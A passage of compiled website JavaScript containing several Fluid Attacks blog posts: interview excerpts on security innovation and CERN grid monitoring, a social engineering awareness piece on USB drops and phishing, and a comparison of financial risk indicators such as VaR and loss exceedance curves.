\"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"ML\"})}),/*#__PURE__*/e(\"strong\",{children:\" or \"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"AI\"})}),/*#__PURE__*/e(\"strong\",{children:\" for your operations?\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'\"Not yet. Two reasons for that: first, we have made a strategic decision not to be early adopters of new technology. We are conservative about managing risks, in part due to the market we serve. Investing in the latest solutions is expensive. I see other fronts where smaller investments have a greater impact on what I do with my team. We seek for small, incremental innovations. Second, we are not focused on forefront topics, like, for example, those Fluid Attacks is concentrated on. Our cybersecurity operations reach a variety of technologies. Some are legacy \u2014for example, our core, production plants. Others, cutting-edge tech. In this heterogeneous environment, it is essential to have a strategy and a vision covering all assets.'})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Nevertheless, there is an opportunity in using \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" in Industrial Networks or \",/*#__PURE__*/e(\"code\",{children:\"OT\"}),\" (Operational Technology). It should be feasible to deploy an \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" practical application to better support our cybersecurity operations.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"We trust on partners like \",/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks\"}),\", which are doing novel work at industry-level. \",/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks\"}),\" invests resources in exploring and testing with stuff others don\u2019t. Fluid Attacks\u2019 \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/continuous-hacking\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Hacking\"})}),\" services are proof of that. A couple of times, I\u2019ve read on the news stuff \",/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks\"}),' began to prototype and test months before.\"']})})]}),/*#__PURE__*/e(\"h2\",{children:\"Innovation in cybersecurity\"}),/*#__PURE__*/t(\"p\",{children:[\"Even more commonplace than \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\", is innovation. What we do at Fluid Attacks, many people describe it as innovation. Nicol\\xe1s mentioned about innovation at Corona, and we were curious to know more.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"What do you consider you are doing differently in cybersecurity?\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"You mentioned you are convinced about the organization approach\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"to innovation.\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'\"I am a critic of the traditional concept of innovation. Innovation is not an end for us; it is an attribute. For Corona, to innovate is to make things we already do, but differently; is to start doing things we previously didn\u2019t do that support our business goals for real. In that way, we make innovation more understandable, more worldly; we remove the strange \u201Cpedestal,\u201D where traditional innovation-speech seem to be. By actively seeking how we can do stuff differently, we create innovation, even if it is not new, but is disruptive for us, and more importantly, it delivers value to the business. We have found (and transformed) processes with no change for more than 130 years!'})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['We have to be very assertive in investments in our business. Those should be centered mostly on detection capabilities, in knowing what is happening. No matter if fixing takes too long after detection. Why? Transparency and honesty. This is a responsible way to manage cybersecurity risks in a company with a traditional vision of risk management because it is easier to ask for resources for protections we don\u2019t have.\" ',/*#__PURE__*/e(\"em\",{children:\"(Interested in transparency and honesty? Take a look at \"}),/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/fck-strategy-and-pratfall-effect/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"em\",{children:\"The F*CK strategy\"})})}),/*#__PURE__*/e(\"em\",{children:\")\"})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['\"Last year we had an idea: what if we develop customized software for cyberintelligence? We needed to know what was going on beyond antivirus or firewalls alerts. We didn\u2019t want to keep looking at mere associations among events (malware, the status of servers, business rules, etc.). We wanted to go further: to know \u201Cthe status\u201D of business processes from our cybersecurity operations. That involves mapping all ',/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" assets and creating risk assessments quickly and easy to understand to company stakeholders. In other words, we wanted to establish a smooth communication to the business in the language of business. Think of it, for example, as a risk score linked to payroll processes, available before the start of the payroll cycle, allowing better decision-making.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"We worked with another partner in developing a customized solution. We turned to agile methodologies, something new for us. The approach was so disruptive \u2014in our terms\u2014 that it wasn\u2019t necessary to include \",/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" stakeholders during development. The technology supporting the soon-to-be solution was on the cloud and container-based. We avoided many committees and discussions. When I presented the product to the company, IT was surprised and told us: \",/*#__PURE__*/e(\"em\",{children:\"\u201Cthis wasn\u2019t discussed in X, Y and Z committees\u2026\u201D\"}),\" but once they saw the product live, they started to fantasize about stuff they could do by working \",/*#__PURE__*/e(\"em\",{children:\"differently.\"})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'An almost entirely functional product was serving us in less than ten months. And we won Corona\u2019s innovation prize, the Prisma award.\"'})})]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What does this software provides that you previously did not have?\"})}),/*#__PURE__*/e(\"ol\",{style:{\"--list-style-type\":\"none\"},children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['\"Timely detections, quicker reaction. We now identify some cybersecurity anomalies in 1.5 hours or 2. Before, we knew about breaches two days after incidents. We can now contain attacks when they are occurring. For example, for the first time, we could detect ',/*#__PURE__*/e(\"strong\",{children:\"Fluid Attacks\"}),' in our most recent ethical hacking project.\"']})})}),/*#__PURE__*/t(\"p\",{children:[\"Check out the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/sensible-cybersecurity/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"second part\"})}),\" of this interview, in which we discuss risk management, setbacks and lessons, truths and lies in cybersecurity, and user behaviors.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Interested in our approach? We offer \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/cybersecurity-essentials/what-is-ethical-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"ethical hacking\"})}),\" in combination with automatic scans. Take a look at our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/continuous-hacking\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Continuous Hacking\"})}),\".\"]})]});export const richText9=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Companies invest millions of dollars on \",/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" infrastructure and cybersecurity to keep their information protected. But when it comes to training their employees the investment is minimal. Employees that daily manipulate, organize, create or update a company\u2019s main data are the main link between \",/*#__PURE__*/e(\"code\",{children:\"IT\"}),\" infrastructure and the data that resides in it. Reality dictates that absolute security is impossible, but let me ask you this: What would you think if I told you there\u2019s a way to get your company\u2019s information that does not need any Internet connection, server or computer? There are many types of social engineering attacks but we will mainly focus on the one that does not need any machine nor Internet connection to be successful.\"]}),/*#__PURE__*/e(\"p\",{children:'\"If my systems are secure my data is also secure.\"'}),/*#__PURE__*/e(\"p\",{children:\"This phrase is usually true, but we have to remember that humans are also an important part of a company\u2019s security. If we don\u2019t consider the human factor the state of security discussed becomes partial and a hacker with malicious intentions could use this weak link to compromise a system or steal sensitive information.\"}),/*#__PURE__*/e(\"p\",{children:\"Usually, an intrusion begins by scanning the exposed perimeter that you want to strike. This will display all the exposed, badly protected or open ports and services that are vulnerable to attack. They become the entry points for everyone intending to breach a system. But what happens when no service is exposed or highly secured? Attackers must make a decision, force their way in and put themselves at risk, or search for a weaker link. This is where social engineering becomes important.\"}),/*#__PURE__*/t(\"p\",{children:['Within the hacker jargon, there\u2019s an attack called the \"secretary attack\". This assault can affect anyone, \"secretary attack\" is simply the given name. The assault is executed by leaving a ',/*#__PURE__*/e(\"code\",{children:\"USB\"}),\" near or at the victim\u2019s workplace. The attacker then needs to wait for the victim to plug the device in their computer, giving an entry point and allowing the attacker to breach the network. Another way this vulnerability is exploited is to ask someone to print out a document from an infected \",/*#__PURE__*/e(\"code\",{children:\"USB\"}),\". It\u2019s common for the attacker to cut ties with the victim once the attack has taken place, making this type of assault difficult to trace.\"]}),/*#__PURE__*/e(\"p\",{children:\"The attack mentioned above is widely used whether the target is a big or a small company. It is executed when there is no possibility of establishing direct access to the company\u2019s network devices by using a common vulnerability. If this intrusion is successful, it will leave no trace and will allow the attacker to obtain any wanted information. The information they have taken will eventually be used to penetrate a company\u2019s system, and will potentiallyput at risk critical infrastructure. The consequences are not only economical but can also negatively impact productivity how an organization\u2019s stakeholders view the company\u2019s credibility and damage the company\u2019s overall reputation.\"}),/*#__PURE__*/e(\"p\",{children:\"A cybercriminal can also use this kind of attack to steal information from individuals. The purpose can be to expand a contact\u2019s network and get more information which will allow the thief to become someone else. This situation is known as identity theft, which brings us to a new vulnerability called phishing. Phishing allows the attacker to move from person-to-person within a victim\u2019s social circle collecting more information for later use.\"}),/*#__PURE__*/e(\"p\",{children:\"In phishing, an attacker can supplant a company or person using emails, Facebook or other social media. In 2017, there was an outbreak of phishing attacks that appeared to be coming from Apple. The scammer asked people to login to a fake Apple support page that asked for sensitive data such as full name, credit card information, email, and address. The information provided by the victims was used to shop online. Another common example is the \u201CNigerian Prince\u201D, who will give the victim a considerable amount of money in exchange of a small amount of money. Usually, $20-50 USD will be asked for, and in return, the fake prince says will transfer to the victim\u2019s designated account millions of dollars.\"}),/*#__PURE__*/e(\"p\",{children:\"How can a company prevent social engineering attacks? By giving a worker only the information they need to fulfill their duties. However, this must be complemented with good employee training and clear regulations on information disclosure, manipulation and secrecy. By the end of the training, an employee must know what information can be public and therefore shared, or what information is private and should have restricted access. This must apply all the time, regardless of whether an employee is working from within the company\u2019s physical building or from a remote location.\"}),/*#__PURE__*/e(\"p\",{children:'The same rule applies to individuals. They should know what information can be public and what information should be private. In every email received, it is always good to check the sender\u2019s information to prevent phishing mail targeted to you. Avoid answering unknown emails that ask you for sensitive or private information such as date of birth, passwords, addresses, phone number, credit card or account numbers, and other related data. If we \"install\" a \"mental antivirus\" that distrusts people and organizations asking for details that should not be widely known we could prevent information leaks, money losses, wasted time, and headaches that usually accompany these kinds of attacks.'})]});export const richText10=/*#__PURE__*/e(a.Fragment,{children:/*#__PURE__*/e(\"p\",{children:'What is the best risk indicator? Bottom line: there is no \"best\", only different approaches to the same thing. Ultimately, it\u2019s up to you. Here we will show the pros and cons of each risk indicator so you can make an informed decision.'})});export const richText11=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"VaR\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/para-bellum/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Recall\"})}),\" that Value at Risk (\",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\") measures the worst-case scenario in an uncertain return by telling us the endpoint beyond which our losses will likely not go, up to a certain degree of confidence, in a definite period of time. Thus a daily 1% \",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\" of $10 million means the probability that you will lose more than $10 million is 1%, which is the same as saying that you are 99% confident that the losses will not exceed $10 million.\"]}),/*#__PURE__*/e(\"p\",{children:\"Pros:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Gives a good idea of how much to save in order to avoid bankruptcy in most (95%) cases.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Is a well-established standard, used by most banks and a requirement per international banking regulations.\"})})]}),/*#__PURE__*/e(\"p\",{children:\"Cons:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Says nothing about what might happen beyond the threshold.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Is a single number, therefore, its expressiveness is rather narrow. It says nothing about what happens elsewhere with the distribution of returns.\"})})]}),/*#__PURE__*/e(\"h2\",{children:\"tVaR\"}),/*#__PURE__*/t(\"p\",{children:[\"While the \",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\" gives a worst-case scenario with a certain confidence, what if that confidence is broken, i.e., the \",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\" is breached? What can we expect? That\u2019s precisely the \",/*#__PURE__*/e(\"em\",{children:\"tail\"}),\" value at risk tries to answer. By using the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/great-expectations/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"expected value\"})}),\" of a \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/updating-belief/#mathematical-interlude\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"conditional probability\"})}),\", it gives us, in a single number, what would be expected if a worst-case scenario occurs.\"]}),/*#__PURE__*/t(\"p\",{children:[\"There is no better way than this plot by \",/*#__PURE__*/e(o,{href:\"http://www.nematrian.com/TailValueAtRisk\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Nematrian\"})}),\" to summarize both \",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"tVaR\"}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"tVaR\",className:\"framer-image\",height:\"250\",src:\"https://framerusercontent.com/images/UURVlEbt7V4AOngYCE3Ir9kuds.png\",srcSet:\"https://framerusercontent.com/images/UURVlEbt7V4AOngYCE3Ir9kuds.png?scale-down-to=512 512w,https://framerusercontent.com/images/UURVlEbt7V4AOngYCE3Ir9kuds.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/UURVlEbt7V4AOngYCE3Ir9kuds.png 1920w\",style:{aspectRatio:\"1920 / 500\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"(t)VaR illustration.\"}),/*#__PURE__*/e(\"p\",{children:\"Pros:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Prepares you for the worst of the worst.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Single number, easy to compare or monitor over time.\"})})]}),/*#__PURE__*/e(\"p\",{children:\"Cons:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Not easy to compute (involves an integral).\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Results can be overly pessimistic, thus impeding you from seeing the other side of the coin.\"})})]}),/*#__PURE__*/e(\"h2\",{children:\"ALE\"}),/*#__PURE__*/t(\"p\",{children:[\"This is a relatively new one. Remember we discussed Return on Control (\",/*#__PURE__*/e(\"code\",{children:\"ROC\"}),\") to decide whether investing in a given defense is worth the hassle?\"]}),/*#__PURE__*/e(\"img\",{alt:\"Return on control\",className:\"framer-image\",height:\"50\",src:\"https://framerusercontent.com/images/tzozuCvJn9u1XauExAwDVNpl2AY.png\",srcSet:\"https://framerusercontent.com/images/tzozuCvJn9u1XauExAwDVNpl2AY.png?scale-down-to=512 512w,https://framerusercontent.com/images/tzozuCvJn9u1XauExAwDVNpl2AY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/tzozuCvJn9u1XauExAwDVNpl2AY.png 1920w\",style:{aspectRatio:\"1920 / 100\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Return on control.\"}),/*#__PURE__*/t(\"p\",{children:['The change in loss was obtained from two simulated scenarios: one with the control and another without it. Both were obtained by \"averaging out\", i.e. finding the ',/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/great-expectations/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"expected value\"})}),\" of a simulated distribution for the loss.\"]}),/*#__PURE__*/t(\"p\",{children:[\"The Annualized Loss Expectancy (\",/*#__PURE__*/e(\"code\",{children:\"ALE\"}),\") is related to such a computation in that it is also obtained from a couple of expected, estimated values. These estimated values are the expected number of occurrences of an event in a year (the Annualized Rate of Occurrence, \",/*#__PURE__*/e(\"code\",{children:\"ARO\"}),\"), and the expected loss for a single occurrence (Single Loss Expectancy, \",/*#__PURE__*/e(\"code\",{children:\"SLE\"}),\"). Thus, total = reps x single. Too many acronyms for too little content:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Chandler\",className:\"framer-image\",height:\"200\",src:\"https://framerusercontent.com/images/QpNUgNV7tqiOIw9HabELI80V6E.png\",srcSet:\"https://framerusercontent.com/images/QpNUgNV7tqiOIw9HabELI80V6E.png?scale-down-to=512 512w,https://framerusercontent.com/images/QpNUgNV7tqiOIw9HabELI80V6E.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/QpNUgNV7tqiOIw9HabELI80V6E.png 1920w\",style:{aspectRatio:\"1920 / 400\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"You don't want to ask Chandler about his Annual Net Usage Statistics!\"}),/*#__PURE__*/t(\"p\",{children:[\"Experts can estimate the ARO. Suppose it is known that a data breach will most likely occur at least once in 10 years. The \",/*#__PURE__*/e(\"code\",{children:\"ARO\"}),\" for such an event is 1/10 = 0.1 events per year. The \",/*#__PURE__*/e(\"code\",{children:\"SLE\"}),\" is to be estimated by your own experts. How much would such a breach cost you? Say, $100 million. Then the loss expected in every one of those years is 0.1x100 = $10 million. However, this rate will be fixed for each of the next ten years. It is static and unlikely to be true since risks and threats change daily.\"]}),/*#__PURE__*/e(\"p\",{children:\"Pros:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Simple computation.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Single number, thus easy to compare.\"})})]}),/*#__PURE__*/e(\"p\",{children:\"Cons:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"You\u2019re stuck with the one year period.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'Not very \"realistic\".'})})]}),/*#__PURE__*/e(\"h2\",{children:\"LEC\"}),/*#__PURE__*/t(\"p\",{children:[\"The loss exceedance curve is a decidedly different one, and one of our favorites at that. We have already discussed it at length in our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/quantifying-risk/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"introduction to quantitative risk\"})}),\", our general \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/monetizing-vulnerabilities/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Monte Carlo simulation article\"})}),\", and gave an example of implementing in \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/quantitative-python/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Quantitative Python\"})}),\". In a nutshell, it\u2019s a graph that tells you the probability of losing a given amount or more of money, for any amount in a range. It\u2019s like having all possible values-at-risk for all confidence levels. We believe the graph speaks for itself.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Loss exceedance curve\",className:\"framer-image\",height:\"350\",src:\"https://framerusercontent.com/images/htvdfPBpWqWOWu1vyjG8E0H0A.png\",srcSet:\"https://framerusercontent.com/images/htvdfPBpWqWOWu1vyjG8E0H0A.png?scale-down-to=512 512w,https://framerusercontent.com/images/htvdfPBpWqWOWu1vyjG8E0H0A.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/htvdfPBpWqWOWu1vyjG8E0H0A.png 1920w\",style:{aspectRatio:\"1920 / 700\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Loss Exceedance Curve from \",/*#__PURE__*/e(o,{href:\"https://www.howtomeasureanything.com/cybersecurity/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Hubbard et al.\"})})]}),/*#__PURE__*/e(\"p\",{children:\"Pros:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"All the information you could want about losses in a single plot.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Since it\u2019s a visual tool it\u2019s helpful when you\u2019re considering a range of risks you\u2019re willing to take, especially when it\u2019s combined with residual risk and risk tolerance curves.\"})})]}),/*#__PURE__*/e(\"p\",{children:\"Cons:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Harder to compare since it\u2019s not a single number.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Harder to obtain, since it involves simulations.\"})})]}),/*#__PURE__*/t(\"p\",{children:[\"Overall, single number risk indicators (\",/*#__PURE__*/e(\"code\",{children:\"ALE\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"tVaR\"}),\") are good for making quick comparisons and monitoring them over time. In contrast, the \",/*#__PURE__*/e(\"code\",{children:\"LEC\"}),\" might allow you to make a more fine-grained decision regarding how much risk you are willing to take vs. how much you would have to lose in many different scenarios, all in a single chart.\"]}),/*#__PURE__*/t(\"p\",{children:[\"For ease of use, we\u2019d say \",/*#__PURE__*/e(\"code\",{children:\"ALE\"}),\" is the winner. However, we wouldn\u2019t expect its predictions to be the most accurate of the lot. Also, its time period (one year) might be too much for the fast-paced market we currently live in. If you have to choose one single-number indicator, we would recommend using \",/*#__PURE__*/e(\"code\",{children:\"VaR\"}),\", which international banking regulations (\",/*#__PURE__*/e(o,{href:\"https://www.investopedia.com/terms/b/baselii.asp\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Basel II\"})}),\") use, since the \",/*#__PURE__*/e(\"code\",{children:\"tVaR\"}),\" might be a tad too extreme.\"]}),/*#__PURE__*/e(\"p\",{children:\"In the end, it\u2019s your choice. Or there might not be any choice to make at all. Who says you cannot use them all at once? If done well, they should not be contradictory, but complimentary. Find out all you can about your investment, use all the tools at hand, and then make the best decision possible in terms of risk vs gain.\"})]});export const richText12=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Have you heard about God\u2019s particle? In 2012, the Large Hadron Collider (\",/*#__PURE__*/e(\"code\",{children:\"LHC\"}),\") found the Higgs Boson; a particle predicted to exist in the 1960s thanks to the work of Peter Higgs and other physicists. The \",/*#__PURE__*/e(\"code\",{children:\"LHC\"}),\" consists of a 27-kilometer ring of superconducting magnets with several accelerating structures to boost the energy of particles along the way. According to \",/*#__PURE__*/e(o,{href:\"https://www.forbes.com/sites/alexknapp/2012/07/05/how-much-does-it-cost-to-find-a-higgs-boson/#695f65e63948\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Forbes\"})}),\", finding the Higgs Boson had cost around \",/*#__PURE__*/e(\"code\",{children:\"USD\"}),\" \",/*#__PURE__*/e(\"code\",{children:\"13.25\"}),\" billion. Now you have a sense of what we will discussing in this post.\"]}),/*#__PURE__*/e(\"img\",{alt:\"LHC\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/L7vjyPv0UioPN9Tb7Owfg8XGhDc.png\",srcSet:\"https://framerusercontent.com/images/L7vjyPv0UioPN9Tb7Owfg8XGhDc.png?scale-down-to=512 512w,https://framerusercontent.com/images/L7vjyPv0UioPN9Tb7Owfg8XGhDc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/L7vjyPv0UioPN9Tb7Owfg8XGhDc.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Large Hadron Collider.\"})]});export const richText13=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"A good friend of ours and former Fluid Attacks security engineer, has been working in that huge scientific project. Andr\\xe9s is a final Ph.D. student in Computer Science at the Goethe University in Germany. His work has focused on securing the computer grid that allows many physicists around the world to analyze data on subatomic particle collisions at the LHC. He has a fantastic record in cybersecurity. Before starting his doctoral studies, he found several serious weaknesses in commercial software. One of his most striking findings was the \",/*#__PURE__*/e(o,{href:\"https://kuronosec.blogspot.com/2013/07/directshow-arbitrary-memory-overwrite.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"CVE-2013 3174 (MS13-56)\"})}),\", which refers to a Remote Execution Vulnerability affecting Microsoft Windows Systems. You can read more about Andr\\xe9s in his \",/*#__PURE__*/e(o,{href:\"https://iri-wiki.uni-frankfurt.de/cms/?q=node/90\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"academic profile\"})}),\",\",/*#__PURE__*/e(o,{href:\"https://iri-wiki.uni-frankfurt.de/cms/?q=node/90\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"blog\"})}),\" or \",/*#__PURE__*/e(o,{href:\"https://twitter.com/kuronosec\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Twitter account\"})}),\".\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What is your doctoral thesis about?\"})}),/*#__PURE__*/t(\"p\",{children:[\"\u201CIt is about creating a security monitoring system for the \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(o,{href:\"https://home.cern/science/experiments/alice\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"ALICE\"})})}),\" computational grid. \",/*#__PURE__*/e(\"code\",{children:\"ALICE\"}),\" is one of the major \",/*#__PURE__*/e(\"code\",{children:\"LHC\"}),\" experiments. The grid is made up of computer centers interconnected around the world that allow scientists to run applications for analyzing data obtained from particle collisions inside \",/*#__PURE__*/e(\"code\",{children:\"ALICE\"}),\". My project is composed of a software framework that isolates applications scientists use in a sandbox. Then, it collects information about the behavior those applications, classifying them as normal or malicious using Machine Learning (\",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\"). And finally, it allows performing actions upon detection of malicious behavior, such as sending alerts or stopping their execution.\u201D\"]}),/*#__PURE__*/t(\"p\",{children:[\"That\u2019s amazing. Researching protecting such a tremendous scientific 